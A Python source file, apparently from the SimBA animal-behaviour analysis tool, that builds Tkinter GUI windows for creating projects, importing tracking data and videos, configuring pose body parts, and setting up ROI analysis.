self.label_generalsettings = LabelFrame(tab1, text='General Settings',fg='black',font =("Helvetica",12,'bold'),padx=5,pady=5)
self.directory1Select = FolderSelect(self.label_generalsettings, "Project Path:", title='Select Main Directory',lblwidth='12')
self.label_project_name = Entry_Box(self.label_generalsettings, 'Project Name:',labelwidth='12')
label_project_namedescrip = Label(self.label_generalsettings, text='(project name cannot contain spaces)')
self.csvORparquet = DropDownMenu(self.label_generalsettings,'Workflow file type',['csv','parquet'],'15')
self.csvORparquet.setChoices('csv')
#SML Settings
self.label_smlsettings = LabelFrame(self.label_generalsettings, text='SML Settings',padx=5,pady=5)
self.label_notarget = Entry_Box(self.label_smlsettings,'Number of predictive classifiers (behaviors):','33',
validation='numeric')
addboxButton = Button(self.label_smlsettings, text='<Add predictive classifier>', fg="navy",
command=lambda:self.addBox(self.label_notarget.entry_get))
##dropdown for # of mice
self.dropdownbox = LabelFrame(self.label_generalsettings, text='Animal Settings')
## choose multi animal or not
self.singleORmulti = DropDownMenu(self.dropdownbox,'Type of Tracking',['Classic tracking','Multi tracking'],'15',
com=self.trackingselect)
self.singleORmulti.setChoices('Classic tracking')
#choice
self.frame2 = Frame(self.dropdownbox)
label_dropdownmice = Label(self.frame2, text='# config')
self.option_mice, optionsBasePhotosList = bodypartConfSchematic()
# del multi animal
del self.option_mice[9:12]
del optionsBasePhotosList[9:12]
self.var = StringVar()
self.var.set(self.option_mice[6])
micedropdown = OptionMenu(self.frame2, self.var, *self.option_mice)
self.var.trace("w", self.change_image)
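# preload one schematic image per pose-config option so the preview can follow the dropdown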
self.photos = []
for i in range(len(optionsBasePhotosList)):
self.photos.append(PhotoImage(file=os.path.join(os.path.dirname(__file__),(optionsBasePhotosList[i]))))
self.label = Label(self.frame2, image=self.photos[6])
self.label.grid(row=10,sticky=W,columnspan=2)
#reset button
resetbutton = Button(self.frame2,text='Reset user-defined pose configs',command=self.resetSettings)
#organize
self.singleORmulti.grid(row=0,sticky=W)
self.frame2.grid(row=1,sticky=W)
label_dropdownmice.grid(row=0,column=0,sticky=W)
micedropdown.grid(row=0,column=1,sticky=W)
self.label.grid(row=1,sticky=W,columnspan=2)
resetbutton.grid(row=0,sticky=W,column=2)
#generate project ini
button_generateprojectini = Button(self.label_generalsettings, text='Generate Project Config ', command=self.make_projectini, font=("Helvetica",10,'bold'),fg='navy')
#####import videos
label_importvideo = LabelFrame(tab2, text='Import Videos into project folder',fg='black', font=("Helvetica",12,'bold'), padx=15, pady=5)
# multi video
label_multivideoimport = LabelFrame(label_importvideo, text='Import multiple videos', pady=5, padx=5)
self.multivideofolderpath = FolderSelect(label_multivideoimport, 'Folder path',title='Select Folder with videos')
self.video_type = Entry_Box(label_multivideoimport, 'Format (e.g., mp4, avi):', '18')
button_multivideoimport = Button(label_multivideoimport, text='Import multiple videos',command= self.import_multivid,fg='navy')
# singlevideo
label_singlevideoimport = LabelFrame(label_importvideo, text='Import single video', pady=5, padx=5)
self.singlevideopath = FileSelect(label_singlevideoimport, "Video path",title='Select a video file')
button_importsinglevideo = Button(label_singlevideoimport, text='Import a video',command= self.import_singlevid,fg='navy')
#import all csv file into project folder
self.label_import_csv = LabelFrame(tab3,text='Import Tracking Data',fg='black',font=("Helvetica",12,'bold'),pady=5,padx=5)
self.filetype = DropDownMenu(self.label_import_csv,'File type',['CSV (DLC/DeepPoseKit)','JSON (BENTO)','H5 (multi-animal DLC)','SLP (SLEAP)'],'12',com=self.fileselected)
self.filetype.setChoices('CSV (DLC/DeepPoseKit)')
self.frame = Frame(self.label_import_csv)
#multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport,'Folder Select:',title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport,text='Import csv to project folder',command = self.import_multicsv,fg='navy')
#singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv file', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport,'File Select',title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport,text='Import single csv to project folder',command=self.import_singlecsv,fg='navy')
#extract videos in projects
label_extractframes = LabelFrame(tab4,text='Extract Frames into project folder',fg='black',font=("Helvetica",12,'bold'),pady=5,padx=5)
label_note = Label(label_extractframes,text='Note: This is no longer needed for labelling videos. Instead, extracted video frames are used for visualizations.')
label_caution = Label(label_extractframes,text='Caution: This extracts all frames from all videos in the project,')
label_caution2 = Label(label_extractframes,text='and is computationally expensive if there are many videos at high frame rates/resolutions.')
button_extractframes = Button(label_extractframes,text='Extract frames',command=self.extract_frames,fg='navy')
#organize
self.label_generalsettings.grid(row=0,sticky=W)
self.directory1Select.grid(row=1,column=0,sticky=W)
self.label_project_name.grid(row=2,column=0,sticky=W)
label_project_namedescrip.grid(row=3,sticky=W)
self.csvORparquet.grid(row=4,sticky=W)
self.label_smlsettings.grid(row=5,column=0,sticky=W,pady=5,columnspan=2)
self.label_notarget.grid(row=0,column=0,sticky=W,pady=5,columnspan=2)
addboxButton.grid(row=1,column=0,sticky=W,pady=6)
self.dropdownbox.grid(row=6,column=0,sticky=W)
button_generateprojectini.grid(row=20, pady=5, ipadx=5, ipady=5)
label_importvideo.grid(row=4,sticky=W,pady=5)
label_multivideoimport.grid(row=0, sticky=W)
self.multivideofolderpath.grid(row=0, sticky=W)
self.video_type.grid(row=1, sticky=W)
button_multivideoimport.grid(row=2, sticky=W)
label_singlevideoimport.grid(row=1,sticky=W)
self.singlevideopath.grid(row=0,sticky=W)
button_importsinglevideo.grid(row=1,sticky=W)
self.label_import_csv.grid(row=5,sticky=W,pady=5)
self.filetype.grid(row=0,sticky=W)
self.frame.grid(row=1,sticky=W)
label_multicsvimport.grid(row=1,sticky=W)
self.folder_csv.grid(row=0,sticky=W)
button_import_csv.grid(row=1,sticky=W)
label_singlecsvimport.grid(row=2,sticky=W)
self.file_csv.grid(row=0,sticky=W)
button_importsinglecsv.grid(row=1,sticky=W)
label_extractframes.grid(row=7,sticky=W)
label_note.grid(row=0,sticky=W)
label_caution.grid(row=1,sticky=W)
label_caution2.grid(row=2,sticky=W)
button_extractframes.grid(row=3,sticky=W)
def trackingselect(self,val):
try:
self.frame2.destroy()
except:
pass
# choice
self.frame2 = Frame(self.dropdownbox)
if val == 'Classic tracking':
label_dropdownmice = Label(self.frame2, text='# config')
self.option_mice, optionsBasePhotosList = bodypartConfSchematic()
# del multi animal
del self.option_mice[9:12]
del optionsBasePhotosList[9:12]
self.var = StringVar()
self.var.set(self.option_mice[6])
micedropdown = OptionMenu(self.frame2, self.var, *self.option_mice)
self.var.trace("w", self.change_image)
self.photos = []
for i in range(len(optionsBasePhotosList)):
self.photos.append(PhotoImage(file=os.path.join(os.path.dirname(__file__), (optionsBasePhotosList[i]))))
self.label = Label(self.frame2, image=self.photos[6])
self.label.grid(row=10, sticky=W, columnspan=2)
# reset button
resetbutton = Button(self.frame2, text='Reset user-defined pose configs', command=self.resetSettings)
# organize
self.frame2.grid(row=1, sticky=W)
label_dropdownmice.grid(row=0, column=0, sticky=W)
micedropdown.grid(row=0, column=1, sticky=W)
self.label.grid(row=1, sticky=W, columnspan=2)
resetbutton.grid(row=0, sticky=W, column=2)
else:
if val == 'Multi tracking':
label_dropdownmice = Label(self.frame2, text='# config')
self.option_mice, optionsBasePhotosList = bodypartConfSchematic()
# del single animal
del self.option_mice[0:9]
del optionsBasePhotosList[0:9]
self.var = StringVar()
self.var.set(self.option_mice[2])
micedropdown = OptionMenu(self.frame2, self.var, *self.option_mice)
self.var.trace("w", self.change_image)
self.photos = []
for i in range(len(optionsBasePhotosList)):
self.photos.append(
PhotoImage(file=os.path.join(os.path.dirname(__file__), (optionsBasePhotosList[i]))))
self.label = Label(self.frame2, image=self.photos[2])
self.label.grid(row=10, sticky=W, columnspan=2)
# reset button
resetbutton = Button(self.frame2, text='Reset user-defined pose configs', command=self.resetSettings)
# organize
self.frame2.grid(row=1, sticky=W)
label_dropdownmice.grid(row=0, column=0, sticky=W)
micedropdown.grid(row=0, column=1, sticky=W)
self.label.grid(row=1, sticky=W, columnspan=2)
resetbutton.grid(row=0, sticky=W, column=2)
def fileselected(self,val):
try:
self.frame.destroy()
except:
pass
self.frame = Frame(self.label_import_csv)
if self.filetype.getChoices()=='CSV (DLC/DeepPoseKit)':
# multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport, 'Folder Select:', title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport, text='Import csv to project folder',
command=self.import_multicsv, fg='navy')
# singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv file', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport, 'File Select', title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport, text='Import single csv to project folder',
command=self.import_singlecsv, fg='navy')
self.frame.grid(row=1,sticky=W)
label_multicsvimport.grid(row=1, sticky=W)
self.folder_csv.grid(row=0, sticky=W)
button_import_csv.grid(row=1, sticky=W)
label_singlecsvimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglecsv.grid(row=1, sticky=W)
elif self.filetype.getChoices()=='JSON (BENTO)':
# multijson
label_multijsonimport = LabelFrame(self.frame, text='Import multiple json files', pady=5, padx=5)
self.folder_json = FolderSelect(label_multijsonimport, 'Folder Select:',
title='Select Folder with .json(s)')
button_import_json = Button(label_multijsonimport, text='Import json to project folder',
command=lambda: json2csv_folder(self.configinifile,
self.folder_json.folder_path), fg='navy')
# singlecsv
label_singlejsonimport = LabelFrame(self.frame, text='Import single json file', pady=5, padx=5)
self.file_json = FileSelect(label_singlejsonimport, 'File Select', title='Select a .csv file')
button_importsinglejson = Button(label_singlejsonimport, text='Import single .json to project folder',
command=lambda: json2csv_file(self.configinifile, self.file_json.file_path),
fg='navy')
# import json into projectfolder
self.frame.grid(row=1, sticky=W)
label_multijsonimport.grid(row=1, sticky=W)
self.folder_json.grid(row=0, sticky=W)
button_import_json.grid(row=1, sticky=W)
label_singlejsonimport.grid(row=2, sticky=W)
self.file_json.grid(row=0, sticky=W)
button_importsinglejson.grid(row=1, sticky=W)
elif self.filetype.getChoices() in ('H5 (multi-animal DLC)','SLP (SLEAP)'):
animalsettings = LabelFrame(self.frame,text='Animal settings',pady=5,padx=5)
noofanimals = Entry_Box(animalsettings,'No of animals','15')
animalnamebutton = Button(animalsettings,text='Confirm',command=lambda:self.animalnames(noofanimals.entry_get,animalsettings))
if self.filetype.getChoices() == 'H5 (multi-animal DLC)':
options =['skeleton','box','ellipse']
self.dropdowndlc = DropDownMenu(self.frame,'Tracking type',options,'15')
self.dropdowndlc.setChoices(options[1])
self.h5path = FolderSelect(self.frame,'Path to h5 files',lblwidth=15)
labelinstruction = Label(self.frame,text='Please import videos before importing the multi animal DLC tracking data')
runsettings = Button(self.frame,text='Import h5',command=self.importh5)
#organize
self.dropdowndlc.grid(row=2, sticky=W)
else:
self.h5path = FolderSelect(self.frame, 'Path to .slp files', lblwidth=15)
labelinstruction = Label(self.frame,
text='Please import videos before importing the multi animal SLEAP tracking data')
runsettings = Button(self.frame, text='Import .slp', command=self.importh5)
#organize
self.frame.grid(row=1,sticky=W)
animalsettings.grid(row=1,sticky=W)
noofanimals.grid(row=0,sticky=W)
animalnamebutton.grid(row=0,column=1,sticky=W)
self.h5path.grid(row=3,sticky=W)
labelinstruction.grid(row=4,pady=10,sticky=W)
runsettings.grid(row=5,pady=10)
def importh5(self):
idlist = []
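# collect the animal identity names typed into the entry boxes created by animalnames()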
try:
for i in self.animalnamelist:
idlist.append(i.entry_get)
except AttributeError:
print('Please fill in the animal identity names appropriately.')
return
# str(list) renders quotes and brackets the same way on every platform; strip them
# so the ID list is stored as a plain comma-separated string in the ini
id_ini = str(idlist)
id_ini = id_ini.replace('\'', '')
id_ini = id_ini.replace('[', '')
id_ini = id_ini.replace(']', '')
id_ini = id_ini.replace(' ', '')
config = ConfigParser()
configFile = str(self.configinifile)
config.read(configFile)
# write the new values into ini file
config.set('Multi animal IDs', 'ID_list',id_ini)
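# e.g. (with hypothetical animal names) the saved ini then contains:
# [Multi animal IDs]
# id_list = Animal_1,Animal_2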
with open(self.configinifile, 'w') as configfile:
config.write(configfile)
if self.filetype.getChoices() == 'H5 (multi-animal DLC)':
importMultiDLCpose(self.configinifile,self.h5path.folder_path,self.dropdowndlc.getChoices(),idlist)
else:
##SLEAP
try:
importSLEAPbottomUP(self.configinifile,self.h5path.folder_path,idlist)
except Exception as e:
messagebox.showerror("Error", str(e))
def animalnames(self,noofanimal,master):
try:
self.frame2.destroy()
except:
pass
no_animal = int(noofanimal)
self.animalnamelist =[0]*no_animal
self.frame2 = Frame(master)
self.frame2.grid(row=1,sticky=W)
for i in range(no_animal):
self.animalnamelist[i] = Entry_Box(self.frame2,'Animal ' + str(i+1) + ' name','15')
self.animalnamelist[i].grid(row=i,sticky=W)
def resetSettings(self):
popup = Tk()
popup.minsize(300, 100)
popup.wm_title("Warning!")
popupframe = LabelFrame(popup)
label = Label(popupframe, text='Do you want to reset user-defined pose-configs?')
label.grid(row=0,columnspan=2)
B1 = Button(popupframe,text='Yes', command= lambda:reset_DiagramSettings(popup))
B2 = Button(popupframe, text="No", command=popup.destroy)
popupframe.grid(row=0,columnspan=2)
B1.grid(row=1,column=0,sticky=W)
B2.grid(row=1,column=1,sticky=W)
popup.mainloop()
def poseconfigSettings(self):
# Popup window
poseconfig = Toplevel()
poseconfig.minsize(400, 400)
poseconfig.wm_title("Pose Configuration")
# define name for poseconfig settings
self.configname = Entry_Box(poseconfig,'Pose config name','15')
# no of animals
self.noOfAnimals = Entry_Box(poseconfig,'# of Animals','15')
# no of bodyparts
self.noOfBp = Entry_Box(poseconfig,'# of Bodyparts','15')
# path to image
self.imgPath = FileSelect(poseconfig,'Image Path')
# button for bodypart table
tablebutton = Button(poseconfig,text='Confirm',command= lambda :self.bpTable(poseconfig))
#button for saving poseconfig
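# it stays disabled until bpTable() builds the body-part table and re-enables it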
self.saveposeConfigbutton = Button(poseconfig,text='Save Pose Config',command=lambda:self.savePoseConfig(poseconfig))
self.saveposeConfigbutton.config(state='disabled')
#organize
self.configname.grid(row=0,sticky=W)
self.noOfAnimals.grid(row=1,sticky=W)
self.noOfBp.grid(row=2,sticky=W)
self.imgPath.grid(row=3,sticky=W,pady=2)
tablebutton.grid(row=4,pady=5)
self.saveposeConfigbutton.grid(row=6,pady=5)
def savePoseConfig(self, master):
configName = self.configname.entry_get
noAnimals = self.noOfAnimals.entry_get
noBps = self.noOfBp.entry_get
Imagepath = self.imgPath.file_path
BpNameList = []
for i in self.bpnamelist:
BpNameList.append(i.entry_get)
define_new_pose_configuration(configName, noAnimals, noBps, Imagepath, BpNameList, noAnimals)
master.destroy()
self.toplevel.destroy()
project_config()
def bpTable(self,master):
print(self.noOfBp.entry_get)
noofbp = int(self.noOfBp.entry_get)
self.bpnamelist = [0]*noofbp
frame = LabelFrame(master,text='Bodyparts\' name')
frame.grid(row=5,sticky=W)
for i in range(noofbp):
self.bpnamelist[i] = Entry_Box(frame,str(i+1),'2')
self.bpnamelist[i].grid(row=i)
self.saveposeConfigbutton.config(state='normal')
def change_image(self,*args):
if (self.var.get() != 'Create pose config...'):
self.label.config(image=self.photos[self.option_mice.index(str(self.var.get()))])
else:
self.poseconfigSettings()
def import_singlecsv(self):
copy_singlecsv_ini(self.configinifile, self.file_csv.file_path)
# read in configini
configFile = str(self.configinifile)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
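# single-animal projects: a csv exported in multi-animal DLC format carries an extra 'individuals' header row that is dropped below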
if not animalIDlist:
csvfile = os.path.join(os.path.dirname(self.configinifile), 'csv', 'input_csv',os.path.basename(self.file_csv.file_path))
df = pd.read_csv(csvfile)
tmplist = []
for i in df.loc[0]:
tmplist.append(i)
if 'individuals' in tmplist:
tmplist.remove('individuals')
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(csvfile, index=False)
print('Row removed for', os.path.basename(csvfile))
else:
pass
def import_multicsv(self):
try:
copy_allcsv_ini(self.configinifile, self.folder_csv.folder_path)
#read in configini
configFile = str(self.configinifile)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
# get all csv in project folder input csv
csvfolder = os.path.join(os.path.dirname(self.configinifile), 'csv', 'input_csv')
allcsvs = []
for i in os.listdir(csvfolder):
if i.endswith('.csv'):
csvfile = os.path.join(csvfolder, i)
allcsvs.append(csvfile)
# screen for madlc format but single animal
for i in allcsvs:
df = pd.read_csv(i)
tmplist = []
for j in df.loc[0]:
tmplist.append(j)
#if it is madlc
if 'individuals' in tmplist:
tmplist.remove('individuals')
#if only single animal in madlc
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(i, index=False)
print('Row removed for',os.path.basename(i))
else:
pass
print('Finished importing tracking data')
except:
print('Please select a folder with csv files to proceed')
def import_multivid(self):
try:
copy_multivideo_ini(self.configinifile, self.multivideofolderpath.folder_path, self.video_type.entry_get)
except:
print('Please select a folder containing the videos and enter the correct video format to proceed')
def import_singlevid(self):
try:
copy_singlevideo_ini(self.configinifile, self.singlevideopath.file_path)
except:
print('Please select a video to proceed')
def addBox(self, noTargetStr):
try:
for i in self.lab:
i.destroy()
for i in self.ent1:
i.destroy()
except:
pass
try:
noTarget = int(noTargetStr)
except ValueError:
print('Invalid number of predictive classifiers')
return
self.all_entries = []
self.lab=[0]*noTarget
self.ent1=[0]*noTarget
for i in range(noTarget):
self.lab[i]= Label(self.label_smlsettings, text=str('Classifier ') + str(i + 1))
self.lab[i].grid(row=i+2, column=0, sticky=W)
self.ent1[i] = Entry(self.label_smlsettings)
self.ent1[i].grid(row=i+2, column=1, sticky=W)
self.all_entries = self.ent1
def setFilepath(self):
file_selected = askopenfilename()
self.modelPath.set(file_selected)
def make_projectini(self):
#get input from user
#general settings input
project_path = self.directory1Select.folder_path
project_name = self.label_project_name.entry_get
msconfig= str('yes')
#sml settings
no_targets = self.label_notarget.entry_get
target_list = []
for number, ent1 in enumerate(self.all_entries):
target_list.append(ent1.get())
### animal settings
listindex = self.option_mice.index(str(self.var.get()))
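# map the selected pose-config schematic onto the body-part count written to the project ini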
if self.singleORmulti.getChoices()=='Classic tracking':
if listindex == 0:
bp = '4'
elif listindex == 1:
bp = '7'
elif listindex == 2:
bp = '8'
elif listindex == 3:
bp = '9'
elif (listindex == 4):
bp = '8'
elif (listindex == 5):
bp='14'
elif (listindex == 6):
bp = '16'
elif listindex == 7:
bp = '987'
elif listindex == 8:
bp = 'user_defined'
else:
bp = 'user_defined'
elif self.singleORmulti.getChoices() =='Multi tracking':
if listindex == 0:
bp = '8'
elif listindex == 1:
bp = '14'
elif listindex == 2:
bp = '16'
else:
bp = 'user_defined'
if (self.singleORmulti.getChoices() =='Classic tracking') and (bp=='user_defined') and (listindex >8):
listindex = listindex + 3
elif (self.singleORmulti.getChoices()=='Multi tracking') and (bp=='user_defined') and (listindex >2):
pass
noAnimalsPath = os.path.join(os.path.dirname(__file__), 'pose_configurations', 'no_animals', 'no_animals.csv')
with open(noAnimalsPath, "r", encoding='utf8') as f:
cr = csv.reader(f, delimiter=",") # , is default
rows = list(cr) # create a list of rows for instance
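# no_animals.csv lists the animal count for each pose config; the multi-animal configs follow the nine classic-tracking entries, hence the offset below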
if (self.singleORmulti.getChoices()=='Multi tracking'):
listindex += 9
animalNo = str(rows[listindex])
self.configinifile = write_inifile(msconfig,project_path,project_name,no_targets,target_list,bp, listindex, animalNo,self.csvORparquet.getChoices())
print('Project ' + '"' + str(project_name) + '"' + " created in folder " + '"' + str(os.path.basename(project_path)) + '"')
def extract_frames(self):
try:
videopath = os.path.join(os.path.dirname(self.configinifile), 'videos')
print(videopath)
extract_frames_ini(videopath, self.configinifile)
except:
print('Please make sure videos are imported and located in /project_folder/videos')
class loadprojectMenu:
def __init__(self,inputcommand):
lpMenu = Toplevel()
lpMenu.minsize(300, 200)
lpMenu.wm_title("Load Project .ini file")
# load project ini
label_loadprojectini = LabelFrame(lpMenu, text='Load Project .ini', font=("Helvetica", 12, 'bold'), pady=5,
padx=5, fg='black')
self.projectconfigini = FileSelect(label_loadprojectini,'File Select:', title='Select config.ini file')
#button
launchloadprojectButton = Button(lpMenu,text='Load Project',command=lambda:self.launch(lpMenu,inputcommand))
#organize
label_loadprojectini.grid(row=0)
self.projectconfigini.grid(row=0,sticky=W)
launchloadprojectButton.grid(row=1,pady=10)
def launch(self,master,command):
if (self.projectconfigini.file_path.endswith('.ini')):
master.destroy()
print(self.projectconfigini.file_path)
command(self.projectconfigini.file_path)
else:
print('Please select the project_config.ini file')
def open_web_link(url):
sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error
cef.Initialize()
cef.CreateBrowserSync(url=url,
window_title=url)
cef.MessageLoop()
def wait_for_internet_connection(url):
while True:
try:
response = urllib.request.urlopen(url, timeout=1)
return
except:
pass
class loadprojectini:
def __init__(self,configini):
#save project ini as attribute
self.projectconfigini = configini
#bodyparts
bodypartscsv= os.path.join((os.path.dirname(self.projectconfigini)),'logs','measures','pose_configs','bp_names','project_bp_names.csv')
bp_set = pd.read_csv(bodypartscsv,header=None)[0].to_list()
# get target
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
notarget = config.getint('SML settings','no_targets')
pose_config_setting = config.get('create ensemble settings','pose_estimation_body_parts')
animalNumber = config.getint('General settings','animal_no')
if pose_config_setting == 'user_defined':
bpSet_2 = bp_set.copy()
if animalNumber > 1:
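# strip the two-character animal suffix (e.g. '_1') so each body-part name is listed once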
bpSet_2 = [x[:-2] for x in bpSet_2]
bpSet_2 = list(set(bpSet_2))
targetlist = {}
for i in range(notarget):
targetlist[(config.get('SML settings','target_name_'+str(i+1)))]=(config.get('SML settings','target_name_'+str(i+1)))
#starting of gui
simongui = Toplevel()
simongui.minsize(1300, 800)
simongui.wm_title("Load project")
simongui.columnconfigure(0, weight=1)
simongui.rowconfigure(0, weight=1)
tab_parent = ttk.Notebook(hxtScrollbar(simongui))
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab6 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab8 = ttk.Frame(tab_parent)
tab9 = ttk.Frame(tab_parent)
tab10 = ttk.Frame(tab_parent)
tab11 = ttk.Frame(tab_parent)
tab12 = ttk.Frame(tab_parent)
tab_parent.add(tab2, text= f"{'[ Further imports (data/video/frames) ]':20s}")
tab_parent.add(tab3, text=f"{'[ Video parameters ]':20s}")
tab_parent.add(tab4, text=f"{'[ Outlier correction ]':20s}")
tab_parent.add(tab6, text=f"{'[ ROI ]':10s}")
tab_parent.add(tab5, text=f"{'[ Extract features ]':20s}")
tab_parent.add(tab7, text=f"{'[ Label behavior ]':20s}")
tab_parent.add(tab8, text=f"{'[ Train machine model ]':20s}")
tab_parent.add(tab9, text=f"{'[ Run machine model ]':20s}")
tab_parent.add(tab10, text=f"{'[ Visualizations ]':20s}")
tab_parent.add(tab11, text=f"{'[ Classifier validation ]':20s}")
tab_parent.add(tab12,text=f"{'[ Add-ons ]':20s}")
tab_parent.grid(row=0)
tab_parent.enable_traversal()
#label import
label_import = LabelFrame(tab2)
#import all csv file into project folder
self.label_import_csv = LabelFrame(label_import, text='Import further tracking data', font=("Helvetica",12,'bold'), pady=5, padx=5,fg='black')
filetype = DropDownMenu(self.label_import_csv,'File type',['CSV (DLC/DeepPoseKit)','JSON (BENTO)','H5 (multi-animal DLC)','SLP (SLEAP)'],'15',com=self.fileselected)
filetype.setChoices('CSV (DLC/DeepPoseKit)')
self.frame = Frame(self.label_import_csv)
# multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport, 'Folder selected:',title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport, text='Import csv to project folder',command= self.importdlctracking_multi,fg='navy')
# singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv files', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport, 'File selected',title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport, text='Import single csv to project folder',command= self.importdlctracking_single,fg='navy')
#import videos
label_importvideo = LabelFrame(label_import, text='Import further videos into project folder', font=("Helvetica",12,'bold'), padx=15,pady=5,fg='black')
# multi video
label_multivideoimport = LabelFrame(label_importvideo, text='Import multiple videos', pady=5, padx=5)
self.multivideofolderpath = FolderSelect(label_multivideoimport, 'Folder path',title='Select Folder with videos')
self.video_type = Entry_Box(label_multivideoimport, 'File format (e.g., mp4/avi):', '20')
button_multivideoimport = Button(label_multivideoimport, text='Import multiple videos',command=self.importvideo_multi, fg='black')
# singlevideo
label_singlevideoimport = LabelFrame(label_importvideo, text='Import single video', pady=5, padx=5)
self.singlevideopath = FileSelect(label_singlevideoimport, "Video Path",title='Select a video file')
button_importsinglevideo = Button(label_singlevideoimport, text='Import a video',command= self.importvideo_single,fg='black')
#extract frames in project folder
label_extractframes = LabelFrame(label_import, text='Extract further frames into project folder', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
button_extractframes = Button(label_extractframes, text='Extract frames', command=self.extract_frames_loadini)
#import frames
label_importframefolder = LabelFrame(label_import, text='Import frame folders', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
self.frame_folder = FolderSelect(label_importframefolder,'Main frame directory',title='Select the main directory with frame folders')
button_importframefolder = Button(label_importframefolder,text='Import frames',command = self.importframefolder )
#import new classifier
label_newclassifier = LabelFrame(label_import,text='Add new classifier(s)', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
self.classifierentry = Entry_Box(label_newclassifier,'Classifier','8')
button_addclassifier = Button(label_newclassifier,text='Add classifier',command=lambda:self.addclassifier(self.classifierentry.entry_get))
#remove classifier
label_removeclassifier = LabelFrame(label_import,text='Remove existing classifier(s)', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
button_removeclassifier = Button(label_removeclassifier,text='Choose a classifier to remove',command=self.removeclassifiermenu)
## archive all csvs
label_archivecsv = LabelFrame(label_import,text='Archive processed files', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
archiveentrybox = Entry_Box(label_archivecsv,'Archive folder name', '16')
button_archivecsv = Button(label_archivecsv,text='Archive',command = lambda: archive_all_csvs(self.projectconfigini,archiveentrybox.entry_get))
#reverse identity
label_reverseID = LabelFrame(label_import,text='Reverse Tracking Identity',font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
label_reverse_info = Label(label_reverseID,text='Note: This only works for 2-animal tracking')
label_git_reverse = Label(label_reverseID, text='[Click here to learn more about the reverse identity process]', cursor='hand2', fg='blue')
label_git_reverse.bind('<Button-1>', lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/reverse_annotations.md'))
reverse_button = Button(label_reverseID,text='Reverse ID',command=self.reverseid)
#get coordinates
label_setscale = LabelFrame(tab3,text='Video parameters (fps, resolution, ppx/mm, etc.)', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
self.distanceinmm = Entry_Box(label_setscale, 'Known distance (mm)', '18')
button_setdistanceinmm = Button(label_setscale, text='Autopopulate table',command=lambda: self.set_distancemm(self.distanceinmm.entry_get))
button_setscale = Button(label_setscale,text='Set video parameters',command=lambda:video_info_table(self.projectconfigini))
#ROI
### define roi
self.roi_define = LabelFrame(tab6, text='Define ROI')
## rectangle
self.rec_entry = Entry_Box(self.roi_define, "# of rectangles", "12")
## circle
self.cir_entry = Entry_Box(self.roi_define, "# of circles", "12")
# polygons
self.pol_entry = Entry_Box(self.roi_define, "# of polygons", "12")
# button
showname = Button(self.roi_define, text="Show Shape Definitions Table", command= lambda:self.table(self.roi_define,self.rec_entry.entry_get,self.cir_entry.entry_get,self.pol_entry.entry_get))
# organize
self.roi_define.grid(row=0, sticky=N)
self.rec_entry.grid(row=1, sticky=W)
self.cir_entry.grid(row=2, sticky=W)
self.pol_entry.grid(row=3, sticky=W)
showname.grid(row=4,pady=10)
#load roi
self.loadroi = LabelFrame(tab6,text='Load ROI')
self.getentrybutton = Button(self.loadroi, text="Load defined ROI table", command=self.loaddefinedroi)
#organize
self.loadroi.grid(row=0,column=1,sticky=N)
self.getentrybutton.grid(row=0)
###analyze roi
self.roi_draw = LabelFrame(tab6, text='Analyze ROI')
# button
analyzeROI = Button(self.roi_draw, text='Analyze ROI data',command= lambda:self.roi_settings('Analyze ROI Data','not append'))
##organize
self.roi_draw.grid(row=0, column=2, sticky=N)
analyzeROI.grid(row=0)
###plot roi
self.roi_draw1 = LabelFrame(tab6, text='Visualize ROI')
# button
visualizeROI = Button(self.roi_draw1, text='Visualize ROI tracking', command=self.visualizeRoiTracking)
visualizeROIfeature = Button(self.roi_draw1, text='Visualize ROI features', command=self.visualizeROifeatures)
##organize
self.roi_draw1.grid(row=0, column=3, sticky=N)
visualizeROI.grid(row=0)
visualizeROIfeature.grid(row=1,pady=10)
#processmovementinroi (duplicate)
processmovementdupLabel = LabelFrame(tab6,text='Analyze distances/velocity')
button_process_movement1 = Button(processmovementdupLabel, text='Analyze distances/velocity',command=lambda: self.roi_settings('Analyze distances/velocity','processmovement'))
self.hmlvar = IntVar()
self.hmlvar.set(1)
